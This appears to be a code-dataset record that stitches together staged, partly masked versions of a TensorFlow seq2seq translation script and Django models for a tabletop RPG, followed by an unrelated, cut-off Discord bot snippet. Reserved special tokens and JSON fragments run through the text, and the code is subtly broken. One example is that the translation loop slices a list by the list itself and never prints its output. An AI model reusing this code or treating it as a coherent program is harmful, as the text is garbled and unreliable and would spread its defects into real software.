"step-4": "import os\nimport numpy as np\nimport tensorflow as tf\nfrom translate import datautil\nimport seq2seq_model\n_buckets = []\nconvo_hist_limit = 1\nmax_source_length = 1\nmax_target_length = 2\nflags = tf.app.flags\nFLAGS = flags.FLAGS\ntf.reset_default_graph\nmax_train_data_size = 0\ndata_dir = 'datacn/'\ndropout = 1.0\ngrad_clip = 5.0\nbatch_size = 60\nhidden_size = 14\nnum_layers = 2\nlearning_rate = 0.5\nlr_decay_factor = 0.99\ncheckpoint_dir = 'data/checkpoints/'\nhidden_size = 100\ncheckpoint_dir = 'fanyichina/checkpoints/'\ndata_dir = 'fanyichina'\n_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n token_ids = list(reversed(datautil.sentence_to_ids(' '.join(\n conversation_history), vocaben, normalize_digits=True, Isch\n =True)))\n bucket_id = min([b for b in range(len(_buckets)) if _buckets[b]\n [0] > len(token_ids)])\n encoder_inputs, decoder_inputs, target_weights = model.get_batch({\n bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(sess, encoder_inputs,\n decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits\n ]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = ' '.join(datautil.ids2texts(outputs,\n rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# -*- coding:utf-8 -*-\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom translate import datautil\nimport seq2seq_model\n\n_buckets = []\nconvo_hist_limit = 1\nmax_source_length = 1\nmax_target_length = 2\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\ntf.reset_default_graph\n\nmax_train_data_size = 0\n\ndata_dir = 'datacn/'\n\ndropout = 1.0\ngrad_clip = 5.0\nbatch_size = 60\nhidden_size = 14\nnum_layers = 2\nlearning_rate = 0.5\nlr_decay_factor = 0.99\n\ncheckpoint_dir = 'data/checkpoints/'\n\nhidden_size = 100\ncheckpoint_dir = 'fanyichina/checkpoints/'\ndata_dir = 'fanyichina'\n_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(\n os.path.join(datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(\n os.path.join(datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size, _buckets, hidden_size, num_layers, dropout,\n grad_clip, batch_size, learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf.float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n\n token_ids = list(reversed(datautil.sentence_to_ids(\n \" \".join(conversation_history), vocaben, normalize_digits=True, Isch=True)))\n bucket_id = min([b for b in range(len(_buckets))\n if _buckets[b][0] > len(token_ids)])\n\n encoder_inputs, decoder_inputs, target_weights = model.get_batch(\n {bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(\n sess, encoder_inputs, decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1))\n for logit in output_logits]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = \" \".join(\n datautil.ids2texts(outputs, rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class Classe(PolymorphicModel):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
<|reserved_special_token_0|>
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Pericia(Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
quantidade_pericias_por_nivel = IntegerField(validators=[
MinValueValidator(1)])
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',
'Não conjurador'))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
max_length=3)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Resistencia(Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
unique_together = 'slug', 'qualidade', 'nivel', 'valor'
def __str__(self):
return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)
class Pericia(Model):
nome = CharField(max_length=37)
slug = CharField(max_length=37, unique=True)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
quantidade_pericias_por_nivel = IntegerField(validators=[
MinValueValidator(1)])
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',
'Não conjurador'))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
max_length=3)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Atributo(Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Resistencia(Model):
nivel = IntegerField(validators=[MaxValueValidator(20),
MinValueValidator(1)])
valor = IntegerField(validators=[MaxValueValidator(20),
MinValueValidator(0)])
NOME = Choices('Fortitude', 'Reflexo', 'Vontade')
nome = CharField(choices=NOME, max_length=9)
SLUG = Choices('fort', 'ref', 'von')
slug = CharField(choices=SLUG, max_length=4)
QUALIDADE = Choices(('boa', 'Resistencia Boa'), ('ruim',
'Resistencia Ruim'))
qualidade = CharField(choices=QUALIDADE, max_length=4)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
class Meta:
unique_together = 'slug', 'qualidade', 'nivel', 'valor'
def __str__(self):
return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)
class Pericia(Model):
nome = CharField(max_length=37)
slug = CharField(max_length=37, unique=True)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
quantidade_pericias_por_nivel = IntegerField(validators=[
MinValueValidator(1)])
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',
'Não conjurador'))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,
max_length=3)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
<|reserved_special_token_1|>
from django.db.models import Model, CharField, IntegerField, ManyToManyField, ForeignKey, PROTECT
from django.core.validators import MaxValueValidator, MinValueValidator
from polymorphic.models import PolymorphicModel
from model_utils import Choices
class Tendencia(Model):
valor = CharField(max_length=16, unique=True)
slug = CharField(max_length=3, unique=True)
def __str__(self):
return self.valor
class Bba(Model):
nivel = IntegerField(
validators=[
MaxValueValidator(20),
MinValueValidator(1)
]
)
valor = IntegerField(
validators=[
MaxValueValidator(20),
MinValueValidator(0)
]
)
QUALIDADE = Choices(('boa', ('BBA Boa')), ('ruim', ('BBA Ruim')))
qualidade = CharField(choices=QUALIDADE, max_length=4)
class Meta:
unique_together = ('qualidade', 'nivel', 'valor')
def __str__(self):
return 'BBA {} nível {}'.format(self.qualidade, self.nivel)
class Atributo(Model):
NOME = Choices(('Força'), ('Destreza'), ('Constituição'),
('Inteligência'), ('Sabedoria'), ('Carisma'))
nome = CharField(choices=NOME, max_length=12, unique=True)
SLUG = Choices(('for'), ('des'), ('con'),
('int'), ('sab'), ('car'))
slug = CharField(choices=SLUG, max_length=3, unique=True)
def __str__(self):
return self.nome
class Resistencia(Model):
nivel = IntegerField(
validators=[
MaxValueValidator(20),
MinValueValidator(1)
]
)
valor = IntegerField(
validators=[
MaxValueValidator(20),
MinValueValidator(0)
]
)
NOME = Choices(('Fortitude'), ('Reflexo'), ('Vontade'))
nome = CharField(choices=NOME, max_length=9)
SLUG = Choices(('fort'), ('ref'), ('von'))
slug = CharField(choices=SLUG, max_length=4)
QUALIDADE = Choices(('boa', ('Resistencia Boa')), ('ruim', ('Resistencia Ruim')))
qualidade = CharField(choices=QUALIDADE, max_length=4)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
class Meta:
unique_together = ('slug', 'qualidade', 'nivel', 'valor')
def __str__(self):
return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)
class Pericia(Model):
nome = CharField(max_length=37)
slug = CharField(max_length=37, unique=True)
atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)
def __str__(self):
return self.nome
class Classe(PolymorphicModel):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
pericias = ManyToManyField(Pericia, related_name='+')
quantidade_pericias_por_nivel = IntegerField(
validators=[
MinValueValidator(1)
]
)
bbas = ManyToManyField(Bba, related_name='+')
resistencias = ManyToManyField(Resistencia, related_name='+')
tendencias = ManyToManyField(Tendencia, related_name='+')
DV = Choices((4, ('d4')), (6, ('d6')), (8, ('d8')), (10, ('d10')), (12, ('d12')))
dv = IntegerField(choices=DV)
CONJURADOR = Choices(('div', ('Divino')), ('arc', ('Arcano')), ('nan', ('Não conjurador')))
conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan, max_length=3)
# conjurador_completo = BooleanField(default=True)
def add_tendencia(self, tendencia):
self.tendencias.append(tendencia)
def add_pericia(self, pericia):
self.pericias.append(pericia)
def add_bba(self, bba):
self.bbas.append(bba)
def add_resistencia(self, resistencia):
self.resistencias.append(resistencia)
def get_bba_nivel(self, nivel):
for bba in self.bbas.all():
assert isinstance(bba, Bba)
if bba.nivel == nivel:
return bba.valor
return 0
def __str__(self):
return self.nome
class ClassePrestigio(Classe):
pass
class Tipo(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Raca(Model):
nome = CharField(max_length=14)
slug = CharField(max_length=14, unique=True)
def __str__(self):
return self.nome
class Modelo(Model):
nome = CharField(max_length=20)
slug = CharField(max_length=20, unique=True)
def __str__(self):
return self.nome
|
flexible
|
{
"blob_id": "c07454dfb9dabb89c86f63063231ae9cf915aa38",
"index": 4116,
"step-1": "<mask token>\n\n\nclass Classe(PolymorphicModel):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n <mask token>\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-2": "<mask token>\n\n\nclass Pericia(Model):\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(validators=[\n MinValueValidator(1)])\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',\n 'Não conjurador'))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,\n max_length=3)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-3": "<mask token>\n\n\nclass Resistencia(Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n unique_together = 'slug', 'qualidade', 'nivel', 'valor'\n\n def __str__(self):\n return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)\n\n\nclass Pericia(Model):\n nome = CharField(max_length=37)\n slug = CharField(max_length=37, unique=True)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(validators=[\n MinValueValidator(1)])\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',\n 'Não conjurador'))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,\n max_length=3)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-4": "<mask token>\n\n\nclass Atributo(Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Resistencia(Model):\n nivel = IntegerField(validators=[MaxValueValidator(20),\n MinValueValidator(1)])\n valor = IntegerField(validators=[MaxValueValidator(20),\n MinValueValidator(0)])\n NOME = Choices('Fortitude', 'Reflexo', 'Vontade')\n nome = CharField(choices=NOME, max_length=9)\n SLUG = Choices('fort', 'ref', 'von')\n slug = CharField(choices=SLUG, max_length=4)\n QUALIDADE = Choices(('boa', 'Resistencia Boa'), ('ruim',\n 'Resistencia Ruim'))\n qualidade = CharField(choices=QUALIDADE, max_length=4)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n\n class Meta:\n unique_together = 'slug', 'qualidade', 'nivel', 'valor'\n\n def __str__(self):\n return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)\n\n\nclass Pericia(Model):\n nome = CharField(max_length=37)\n slug = CharField(max_length=37, unique=True)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(validators=[\n MinValueValidator(1)])\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, 'd4'), (6, 'd6'), (8, 'd8'), (10, 'd10'), (12, 'd12'))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', 'Divino'), ('arc', 'Arcano'), ('nan',\n 'Não conjurador'))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan,\n max_length=3)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-5": "from django.db.models import Model, CharField, IntegerField, ManyToManyField, ForeignKey, PROTECT\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom polymorphic.models import PolymorphicModel\nfrom model_utils import Choices\n\n\nclass Tendencia(Model):\n valor = CharField(max_length=16, unique=True)\n slug = CharField(max_length=3, unique=True)\n\n def __str__(self):\n return self.valor\n\n\nclass Bba(Model):\n nivel = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(1)\n ]\n )\n valor = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(0)\n ]\n )\n QUALIDADE = Choices(('boa', ('BBA Boa')), ('ruim', ('BBA Ruim')))\n qualidade = CharField(choices=QUALIDADE, max_length=4)\n\n class Meta:\n unique_together = ('qualidade', 'nivel', 'valor')\n\n def __str__(self):\n return 'BBA {} nível {}'.format(self.qualidade, self.nivel)\n\n\nclass Atributo(Model):\n NOME = Choices(('Força'), ('Destreza'), ('Constituição'),\n ('Inteligência'), ('Sabedoria'), ('Carisma'))\n nome = CharField(choices=NOME, max_length=12, unique=True)\n SLUG = Choices(('for'), ('des'), ('con'),\n ('int'), ('sab'), ('car'))\n slug = CharField(choices=SLUG, max_length=3, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Resistencia(Model):\n nivel = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(1)\n ]\n )\n valor = IntegerField(\n validators=[\n MaxValueValidator(20),\n MinValueValidator(0)\n ]\n )\n NOME = Choices(('Fortitude'), ('Reflexo'), ('Vontade'))\n nome = CharField(choices=NOME, max_length=9)\n SLUG = Choices(('fort'), ('ref'), ('von'))\n slug = CharField(choices=SLUG, max_length=4)\n QUALIDADE = Choices(('boa', ('Resistencia Boa')), ('ruim', ('Resistencia Ruim')))\n qualidade = CharField(choices=QUALIDADE, max_length=4)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n class Meta:\n unique_together = ('slug', 'qualidade', 'nivel', 'valor')\n\n def __str__(self):\n return '{} {} nivel {}'.format(self.nome, self.qualidade, self.nivel)\n\n\nclass Pericia(Model):\n nome = CharField(max_length=37)\n slug = CharField(max_length=37, unique=True)\n atributo = ForeignKey(Atributo, related_name='+', on_delete=PROTECT)\n\n def __str__(self):\n return self.nome\n\n\nclass Classe(PolymorphicModel):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n pericias = ManyToManyField(Pericia, related_name='+')\n quantidade_pericias_por_nivel = IntegerField(\n validators=[\n MinValueValidator(1)\n ]\n )\n bbas = ManyToManyField(Bba, related_name='+')\n resistencias = ManyToManyField(Resistencia, related_name='+')\n tendencias = ManyToManyField(Tendencia, related_name='+')\n DV = Choices((4, ('d4')), (6, ('d6')), (8, ('d8')), (10, ('d10')), (12, ('d12')))\n dv = IntegerField(choices=DV)\n CONJURADOR = Choices(('div', ('Divino')), ('arc', ('Arcano')), ('nan', ('Não conjurador')))\n conjurador = CharField(choices=CONJURADOR, default=CONJURADOR.nan, max_length=3)\n\n # conjurador_completo = BooleanField(default=True)\n\n def add_tendencia(self, tendencia):\n self.tendencias.append(tendencia)\n\n def add_pericia(self, pericia):\n self.pericias.append(pericia)\n\n def add_bba(self, bba):\n self.bbas.append(bba)\n\n def add_resistencia(self, resistencia):\n self.resistencias.append(resistencia)\n\n def get_bba_nivel(self, nivel):\n for bba in self.bbas.all():\n assert isinstance(bba, Bba)\n if bba.nivel == nivel:\n return bba.valor\n return 0\n\n def __str__(self):\n return self.nome\n\n\nclass ClassePrestigio(Classe):\n pass\n\n\nclass Tipo(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Raca(Model):\n nome = CharField(max_length=14)\n slug = CharField(max_length=14, unique=True)\n\n def __str__(self):\n return self.nome\n\n\nclass Modelo(Model):\n nome = CharField(max_length=20)\n slug = CharField(max_length=20, unique=True)\n\n def __str__(self):\n return self.nome\n",
"step-ids": [
15,
20,
23,
25,
35
]
}
|
[
15,
20,
23,
25,
35
] |
<|reserved_special_token_0|>
def insert_returns(body):
if isinstance(body[-1], ast.Expr):
body[-1] = ast.Return(body[-1].value)
ast.fix_missing_locations(body[-1])
if isinstance(body[-1], ast.If):
insert_returns(body[-1].body)
insert_returns(body[-1].orelse)
if isinstance(body[-1], ast.With):
insert_returns(body[-1].body)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_prefix(client, message):
if str(message.guild.id) not in Data.server_data:
Data.server_data[str(message.guild.id)] = Data.create_new_data()
data = Data.server_data[str(message.guild.id)]
return data['prefix']
<|reserved_special_token_0|>
bot.add_cog(Miscellaneous(bot, THEME_COLOR))
bot.add_cog(ServerSettings(bot, THEME_COLOR))
bot.add_cog(Moderator(bot, THEME_COLOR))
bot.add_cog(AutoMod(bot, THEME_COLOR))
bot.add_cog(Fun(bot, THEME_COLOR))
bot.add_cog(Google(bot, THEME_COLOR))
<|reserved_special_token_0|>
@bot.event
async def on_ready():
bot.loop.create_task(Data.auto_update_data())
bot.loop.create_task(update_presence(bot, PREFIX))
print('Bot is ready...')
@bot.event
async def on_guild_join(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
f'Joined - {guild.name}\nServer ID - {guild.id}\nOwner - {guild.owner}'
)
@bot.event
async def on_guild_remove(guild):
log_channel = bot.get_channel(773580297954394162)
await log_channel.send(
